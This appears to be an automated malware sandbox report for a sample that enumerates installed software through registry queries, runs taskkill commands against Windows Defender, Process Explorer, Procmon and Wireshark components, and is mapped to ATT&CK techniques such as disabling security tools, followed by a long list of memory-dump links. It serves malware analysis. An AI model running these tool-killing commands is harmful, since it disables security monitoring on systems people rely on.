C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:32
3⤵
PID:1880

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1828

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:1032

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:32
3⤵
PID:1616

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:596

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:1892

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:32
3⤵
PID:1984

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:288

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:2036

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:32
3⤵
PID:1768

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:2028

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:1884

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:32
3⤵
PID:568

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1632

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:1488

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:32
3⤵
PID:1000

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:912

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:1848

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:32
3⤵
PID:1836

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1888

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:2008

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:32
3⤵
PID:1196

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1844

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:1824

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:32
3⤵
PID:1084

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1776

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:64
3⤵
- Checks for installed software on the system
PID:1100

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:32
3⤵
PID:1568

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1620

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
3⤵
- Checks for installed software on the system
PID:1996

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
3⤵
PID:1476

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
2⤵
- Kills process with taskkill
PID:1612

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1096

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
3⤵
- Checks for installed software on the system
PID:1984

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
3⤵
PID:536

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1768

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
3⤵
- Checks for installed software on the system
PID:1804

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
3⤵
PID:2004

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1924

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:64
3⤵
PID:1488

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:32
3⤵
- Checks for installed software on the system
PID:1936

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1948

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
3⤵
PID:1836

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
3⤵
- Checks for installed software on the system
PID:1344

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1832

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:64
3⤵
PID:1920

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:32
3⤵
- Checks for installed software on the system
PID:1824

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:800

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
3⤵
PID:1580

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
3⤵
PID:1568

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1968

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
3⤵
PID:1996

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
3⤵
PID:1476

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1576

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
3⤵
PID:1472

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
3⤵
PID:1932

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1940

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
3⤵
PID:1984

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
3⤵
PID:388

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1532

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
3⤵
PID:2004

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
3⤵
PID:1976

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1064

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
3⤵
PID:1404

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
3⤵
PID:1836

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:828

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
3⤵
PID:1084

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
3⤵
PID:1824

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1100

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:64
3⤵
PID:752

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:32
3⤵
- Checks for installed software on the system
PID:1392

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1996

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:64
3⤵
PID:1496

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:32
3⤵
- Checks for installed software on the system
PID:1548

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1932

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:64
3⤵
PID:1088

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:32
3⤵
PID:1884

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1000

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
3⤵
PID:2004

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
3⤵
- Checks for installed software on the system
PID:1712

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1344

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
3⤵
PID:1836

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
3⤵
- Checks for installed software on the system
PID:1920

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1052

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
3⤵
PID:1552

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
3⤵
- Checks for installed software on the system
PID:752

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
2⤵
- Kills process with taskkill
PID:1476

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
2⤵
- Kills process with taskkill
PID:388

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
2⤵
- Kills process with taskkill
PID:1084

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
2⤵
- Kills process with taskkill
PID:1496

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
2⤵
- Kills process with taskkill
PID:1848

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
2⤵
- Kills process with taskkill
PID:268

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
2⤵
- Kills process with taskkill
PID:1620

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
2⤵
- Kills process with taskkill
PID:1096

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
2⤵
- Kills process with taskkill
PID:1876

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Modify Existing Service

T1031

Hidden Files and Directories

T1158

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\.ntusernt.ini

Download Submit
C:\Users\Admin\vIXib\Desktop.ini

Download Submit
C:\Users\Admin\vIXib\FXswr.class

Download Submit
\Users\Admin\AppData\Local\Temp\cYaaipQURy1155450875990357936.xml

Download Submit
memory/268-175-0x0000000000000000-mapping.dmp

Download
memory/268-267-0x0000000000000000-mapping.dmp

Download
memory/288-183-0x0000000000000000-mapping.dmp

Download
memory/288-115-0x0000000000000000-mapping.dmp

Download
memory/296-125-0x0000000000000000-mapping.dmp

Download
memory/296-92-0x0000000000000000-mapping.dmp

Download
memory/332-165-0x0000000000000000-mapping.dmp

Download
memory/332-51-0x0000000000000000-mapping.dmp

Download
memory/344-3-0x0000000000000000-mapping.dmp

Download
memory/388-263-0x0000000000000000-mapping.dmp

Download
memory/388-234-0x0000000000000000-mapping.dmp

Download
memory/388-35-0x0000000000000000-mapping.dmp

Download
memory/524-44-0x0000000000000000-mapping.dmp

Download
memory/536-210-0x0000000000000000-mapping.dmp

Download
memory/536-57-0x0000000000000000-mapping.dmp

Download
memory/536-109-0x0000000000000000-mapping.dmp

Download
memory/556-117-0x0000000000000000-mapping.dmp

Download
memory/560-161-0x0000000000000000-mapping.dmp

Download
memory/568-188-0x0000000000000000-mapping.dmp

Download
memory/596-145-0x0000000000000000-mapping.dmp

Download
memory/596-180-0x0000000000000000-mapping.dmp

Download
memory/616-130-0x0000000000000000-mapping.dmp

Download
memory/616-60-0x0000000000000000-mapping.dmp

Download
memory/656-148-0x0000000000000000-mapping.dmp

Download
memory/704-122-0x0000000000000000-mapping.dmp

Download
memory/736-98-0x0000000000000000-mapping.dmp

Download
memory/736-33-0x0000000000000000-mapping.dmp

Download
memory/752-261-0x0000000000000000-mapping.dmp

Download
memory/752-245-0x0000000000000000-mapping.dmp

Download
memory/756-49-0x0000000000000000-mapping.dmp

Download
memory/784-151-0x0000000000000000-mapping.dmp

Download
memory/796-29-0x0000000000000000-mapping.dmp

Download
memory/800-223-0x0000000000000000-mapping.dmp

Download
memory/800-67-0x0000000000000000-mapping.dmp

Download
memory/828-163-0x0000000000000000-mapping.dmp

Download
memory/828-241-0x0000000000000000-mapping.dmp

Download
memory/832-110-0x0000000000000000-mapping.dmp

Download
memory/832-139-0x0000000000000000-mapping.dmp

Download
memory/912-1-0x0000000000000000-mapping.dmp

Download
memory/912-192-0x0000000000000000-mapping.dmp

Download
memory/1000-253-0x0000000000000000-mapping.dmp

Download
memory/1000-159-0x0000000000000000-mapping.dmp

Download
memory/1000-191-0x0000000000000000-mapping.dmp

Download
memory/1032-178-0x0000000000000000-mapping.dmp

Download
memory/1032-43-0x0000000000000000-mapping.dmp

Download
memory/1032-116-0x0000000000000000-mapping.dmp

Download
memory/1032-74-0x0000000000000000-mapping.dmp

Download
memory/1036-129-0x0000000000000000-mapping.dmp

Download
memory/1052-259-0x0000000000000000-mapping.dmp

Download
memory/1052-26-0x0000000000000000-mapping.dmp

Download
memory/1056-30-0x0000000000000000-mapping.dmp

Download
memory/1064-238-0x0000000000000000-mapping.dmp

Download
memory/1064-123-0x0000000000000000-mapping.dmp

Download
memory/1072-54-0x0000000000000000-mapping.dmp

Download
memory/1072-69-0x0000000000000000-mapping.dmp

Download
memory/1072-160-0x0000000000000000-mapping.dmp

Download
memory/1084-62-0x0000000000000000-mapping.dmp

Download
memory/1084-264-0x0000000000000000-mapping.dmp

Download
memory/1084-200-0x0000000000000000-mapping.dmp

Download
memory/1084-242-0x0000000000000000-mapping.dmp

Download
memory/1088-100-0x0000000000000000-mapping.dmp

Download
memory/1088-251-0x0000000000000000-mapping.dmp

Download
memory/1088-4-0x0000000000000000-mapping.dmp

Download
memory/1088-61-0x0000000000000000-mapping.dmp

Download
memory/1096-208-0x0000000000000000-mapping.dmp

Download
memory/1096-80-0x0000000000000000-mapping.dmp

Download
memory/1096-269-0x0000000000000000-mapping.dmp

Download
memory/1100-133-0x0000000000000000-mapping.dmp

Download
memory/1100-244-0x0000000000000000-mapping.dmp

Download
memory/1100-202-0x0000000000000000-mapping.dmp

Download
memory/1112-5-0x0000000000000000-mapping.dmp

Download
memory/1120-72-0x0000000000000000-mapping.dmp

Download
memory/1168-71-0x0000000000000000-mapping.dmp

Download
memory/1196-197-0x0000000000000000-mapping.dmp

Download
memory/1196-121-0x0000000000000000-mapping.dmp

Download
memory/1196-34-0x0000000000000000-mapping.dmp

Download
memory/1212-131-0x0000000000000000-mapping.dmp

Download
memory/1220-132-0x0000000000000000-mapping.dmp

Download
memory/1220-101-0x0000000000000000-mapping.dmp

Download
memory/1220-170-0x0000000000000000-mapping.dmp

Download
memory/1344-219-0x0000000000000000-mapping.dmp

Download
memory/1344-256-0x0000000000000000-mapping.dmp

Download
memory/1392-38-0x0000000000000000-mapping.dmp

Download
memory/1392-246-0x0000000000000000-mapping.dmp

Download
memory/1392-10-0x0000000000000000-mapping.dmp

Download
memory/1392-144-0x0000000000000000-mapping.dmp

Download
memory/1400-47-0x0000000000000000-mapping.dmp

Download
memory/1400-89-0x0000000000000000-mapping.dmp

Download
memory/1400-59-0x0000000000000000-mapping.dmp

Download
memory/1404-14-0x0000000000000000-mapping.dmp

Download
memory/1404-239-0x0000000000000000-mapping.dmp

Download
memory/1408-169-0x0000000000000000-mapping.dmp

Download
memory/1408-102-0x0000000000000000-mapping.dmp

Download
memory/1472-230-0x0000000000000000-mapping.dmp

Download
memory/1472-147-0x0000000000000000-mapping.dmp

Download
memory/1476-207-0x0000000000000000-mapping.dmp

Download
memory/1476-228-0x0000000000000000-mapping.dmp

Download
memory/1476-262-0x0000000000000000-mapping.dmp

Download
memory/1488-215-0x0000000000000000-mapping.dmp

Download
memory/1488-190-0x0000000000000000-mapping.dmp

Download
memory/1492-28-0x0000000000000000-mapping.dmp

Download
memory/1496-248-0x0000000000000000-mapping.dmp

Download
memory/1496-265-0x0000000000000000-mapping.dmp

Download
memory/1500-31-0x0000000000000000-mapping.dmp

Download
memory/1516-68-0x0000000000000000-mapping.dmp

Download
memory/1516-171-0x0000000000000000-mapping.dmp

Download
memory/1524-55-0x0000000000000000-mapping.dmp

Download
memory/1524-104-0x0000000000000000-mapping.dmp

Download
memory/1528-53-0x0000000000000000-mapping.dmp

Download
memory/1528-32-0x0000000000000000-mapping.dmp

Download
memory/1532-235-0x0000000000000000-mapping.dmp

Download
memory/1532-50-0x0000000000000000-mapping.dmp

Download
memory/1532-63-0x0000000000000000-mapping.dmp

Download
memory/1548-249-0x0000000000000000-mapping.dmp

Download
memory/1548-113-0x0000000000000000-mapping.dmp

Download
memory/1552-41-0x0000000000000000-mapping.dmp

Download
memory/1552-138-0x0000000000000000-mapping.dmp

Download
memory/1552-260-0x0000000000000000-mapping.dmp

Download
memory/1556-149-0x0000000000000000-mapping.dmp

Download
memory/1568-203-0x0000000000000000-mapping.dmp

Download
memory/1568-225-0x0000000000000000-mapping.dmp

Download
memory/1576-229-0x0000000000000000-mapping.dmp

Download
memory/1580-20-0x0000000000000000-mapping.dmp

Download
memory/1580-224-0x0000000000000000-mapping.dmp

Download
memory/1580-105-0x0000000000000000-mapping.dmp

Download
memory/1580-135-0x0000000000000000-mapping.dmp

Download
memory/1584-18-0x0000000000000000-mapping.dmp

Download
memory/1584-157-0x0000000000000000-mapping.dmp

Download
memory/1588-140-0x0000000000000000-mapping.dmp

Download
memory/1588-77-0x0000000000000000-mapping.dmp

Download
memory/1592-153-0x0000000000000000-mapping.dmp

Download
memory/1608-37-0x0000000000000000-mapping.dmp

Download
memory/1612-19-0x0000000000000000-mapping.dmp

Download
memory/1612-78-0x0000000000000000-mapping.dmp

Download
memory/1612-206-0x0000000000000000-mapping.dmp

Download
memory/1616-2-0x0000000000000000-mapping.dmp

Download
memory/1616-179-0x0000000000000000-mapping.dmp

Download
memory/1616-83-0x0000000000000000-mapping.dmp

Download
memory/1620-268-0x0000000000000000-mapping.dmp

Download
memory/1620-204-0x0000000000000000-mapping.dmp

Download
memory/1624-21-0x0000000000000000-mapping.dmp

Download
memory/1632-65-0x0000000000000000-mapping.dmp

Download
memory/1632-189-0x0000000000000000-mapping.dmp

Download
memory/1632-103-0x0000000000000000-mapping.dmp

Download
memory/1640-79-0x0000000000000000-mapping.dmp

Download
memory/1652-39-0x0000000000000000-mapping.dmp

Download
memory/1652-111-0x0000000000000000-mapping.dmp

Download
memory/1652-75-0x0000000000000000-mapping.dmp

Download
memory/1656-120-0x0000000000000000-mapping.dmp

Download
memory/1680-82-0x0000000000000000-mapping.dmp

Download
memory/1712-6-0x0000000000000000-mapping.dmp

Download
memory/1712-255-0x0000000000000000-mapping.dmp

Download
memory/1752-88-0x0000000000000000-mapping.dmp

Download
memory/1752-156-0x0000000000000000-mapping.dmp

Download
memory/1768-211-0x0000000000000000-mapping.dmp

Download
memory/1768-97-0x0000000000000000-mapping.dmp

Download
memory/1768-185-0x0000000000000000-mapping.dmp

Download
memory/1772-91-0x0000000000000000-mapping.dmp

Download
memory/1776-201-0x0000000000000000-mapping.dmp

Download
memory/1776-64-0x0000000000000000-mapping.dmp

Download
memory/1780-84-0x0000000000000000-mapping.dmp

Download
memory/1788-137-0x0000000000000000-mapping.dmp

Download
memory/1792-15-0x0000000000000000-mapping.dmp

Download
memory/1796-168-0x0000000000000000-mapping.dmp

Download
memory/1796-99-0x0000000000000000-mapping.dmp

Download
memory/1796-46-0x0000000000000000-mapping.dmp

Download
memory/1804-212-0x0000000000000000-mapping.dmp

Download
memory/1808-8-0x0000000000000000-mapping.dmp

Download
memory/1808-174-0x0000000000000000-mapping.dmp

Download
memory/1808-73-0x0000000000000000-mapping.dmp

Download
memory/1812-167-0x0000000000000000-mapping.dmp

Download
memory/1816-96-0x0000000000000000-mapping.dmp

Download
memory/1816-128-0x0000000000000000-mapping.dmp

Download
memory/1820-11-0x0000000000000000-mapping.dmp

Download
memory/1824-199-0x0000000000000000-mapping.dmp

Download
memory/1824-127-0x0000000000000000-mapping.dmp

Download
memory/1824-243-0x0000000000000000-mapping.dmp

Download
memory/1824-222-0x0000000000000000-mapping.dmp

Download
memory/1828-141-0x0000000000000000-mapping.dmp

Download
memory/1828-48-0x0000000000000000-mapping.dmp

Download
memory/1828-177-0x0000000000000000-mapping.dmp

Download
memory/1832-220-0x0000000000000000-mapping.dmp

Download
memory/1836-257-0x0000000000000000-mapping.dmp

Download
memory/1836-218-0x0000000000000000-mapping.dmp

Download
memory/1836-240-0x0000000000000000-mapping.dmp

Download
memory/1836-162-0x0000000000000000-mapping.dmp

Download
memory/1836-194-0x0000000000000000-mapping.dmp

Download
memory/1840-152-0x0000000000000000-mapping.dmp

Download
memory/1840-106-0x0000000000000000-mapping.dmp

Download
memory/1840-36-0x0000000000000000-mapping.dmp

Download
memory/1844-198-0x0000000000000000-mapping.dmp

Download
memory/1844-124-0x0000000000000000-mapping.dmp

Download
memory/1848-193-0x0000000000000000-mapping.dmp

Download
memory/1848-266-0x0000000000000000-mapping.dmp

Download
memory/1848-12-0x0000000000000000-mapping.dmp

Download
memory/1852-16-0x0000000000000000-mapping.dmp

Download
memory/1876-108-0x0000000000000000-mapping.dmp

Download
memory/1876-270-0x0000000000000000-mapping.dmp

Download
memory/1876-23-0x0000000000000000-mapping.dmp

Download
memory/1880-176-0x0000000000000000-mapping.dmp

Download
memory/1884-40-0x0000000000000000-mapping.dmp

Download
memory/1884-85-0x0000000000000000-mapping.dmp

Download
memory/1884-252-0x0000000000000000-mapping.dmp

Download
memory/1884-154-0x0000000000000000-mapping.dmp

Download
memory/1884-187-0x0000000000000000-mapping.dmp

Download
memory/1888-126-0x0000000000000000-mapping.dmp

Download
memory/1888-195-0x0000000000000000-mapping.dmp

Download
memory/1892-181-0x0000000000000000-mapping.dmp

Download
memory/1920-221-0x0000000000000000-mapping.dmp

Download
memory/1920-258-0x0000000000000000-mapping.dmp

Download
memory/1920-95-0x0000000000000000-mapping.dmp

Download
memory/1920-166-0x0000000000000000-mapping.dmp

Download
memory/1920-22-0x0000000000000000-mapping.dmp

Download
memory/1924-66-0x0000000000000000-mapping.dmp

Download
memory/1924-214-0x0000000000000000-mapping.dmp

Download
memory/1928-134-0x0000000000000000-mapping.dmp

Download
memory/1932-250-0x0000000000000000-mapping.dmp

Download
memory/1932-231-0x0000000000000000-mapping.dmp

Download
memory/1932-114-0x0000000000000000-mapping.dmp

Download
memory/1932-142-0x0000000000000000-mapping.dmp

Download
memory/1936-90-0x0000000000000000-mapping.dmp

Download
memory/1936-216-0x0000000000000000-mapping.dmp

Download
memory/1940-232-0x0000000000000000-mapping.dmp

Download
memory/1940-86-0x0000000000000000-mapping.dmp

Download
memory/1940-25-0x0000000000000000-mapping.dmp

Download
memory/1944-45-0x0000000000000000-mapping.dmp

Download
memory/1948-164-0x0000000000000000-mapping.dmp

Download
memory/1948-217-0x0000000000000000-mapping.dmp

Download
memory/1948-87-0x0000000000000000-mapping.dmp

Download
memory/1964-42-0x0000000000000000-mapping.dmp

Download
memory/1964-143-0x0000000000000000-mapping.dmp

Download
memory/1968-226-0x0000000000000000-mapping.dmp

Download
memory/1972-158-0x0000000000000000-mapping.dmp

Download
memory/1972-24-0x0000000000000000-mapping.dmp

Download
memory/1972-112-0x0000000000000000-mapping.dmp

Download
memory/1976-237-0x0000000000000000-mapping.dmp

Download
memory/1984-233-0x0000000000000000-mapping.dmp

Download
memory/1984-182-0x0000000000000000-mapping.dmp

Download
memory/1984-209-0x0000000000000000-mapping.dmp

Download
memory/1996-247-0x0000000000000000-mapping.dmp

Download
memory/1996-136-0x0000000000000000-mapping.dmp

Download
memory/1996-205-0x0000000000000000-mapping.dmp

Download
memory/1996-173-0x0000000000000000-mapping.dmp

Download
memory/1996-56-0x0000000000000000-mapping.dmp

Download
memory/1996-227-0x0000000000000000-mapping.dmp

Download
